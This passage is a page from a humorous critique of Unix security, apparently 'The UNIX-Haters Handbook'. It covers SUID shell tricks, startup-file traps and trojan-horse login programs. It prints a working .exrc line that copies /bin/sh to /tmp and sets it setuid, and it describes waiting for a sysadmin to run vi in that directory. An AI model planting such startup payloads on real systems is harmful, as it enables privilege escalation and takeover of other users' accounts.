ugh.book

(singke) #1

250 Security


run the newly created /tmp/.sh1 to read, delete, or run any of his files with-
out the formality of learning his password or logging in as him. If he’s got
access to a SUID root shell program (usually called doit), so do you. Con-
gratulations! The entire system is at your mercy.

Startup traps
When a complicated Unix program starts up, it reads configuration files
from either the user’s home directory and/or the current directory to set ini-
tial and default parameters that customize the program to the user’s specifi-
cations. Unfortunately, start up files can be created and left by other users
to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast screen-
oriented editor that’s preferred by many sysadmins.^ It’s too bad that vi
can’t edit more than one file at a time, which is why sysadmins frequently
start up vi from their current directory, rather than in their home directory.
Therein lies the rub.

At startup, vi searches for a file called.exrc, the vi startup file, in the cur-
rent directory. Want to steal a few privs? Put a file called.exrc with the
following contents into a directory:
!(cp /bin/sh /tmp/.s$$;chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that direc-
tory. When she does, she’ll see a flashing exclamation mark at the bottom
of her screen for a brief instant, and you’ll have an SUID shell waiting for
you in /tmp, just like the previous attack.

Trusted Path and Trojan Horses
Standard Unix provides no trusted path to the operating system. We’ll
explain this concept with an example. Consider the standard Unix login
procedure:
login: jrandom
password: <type your “secret” password>

When you type your password, how do you know that you are typing to the
honest-to-goodness Unix /bin/login program, and not some treacherous
doppelganger? Such doppelgangers, called “trojan horses,” are widely
available on cracker bulletin boards; their sole purpose is to capture your
username and password for later, presumably illegitimate, use.
Free download pdf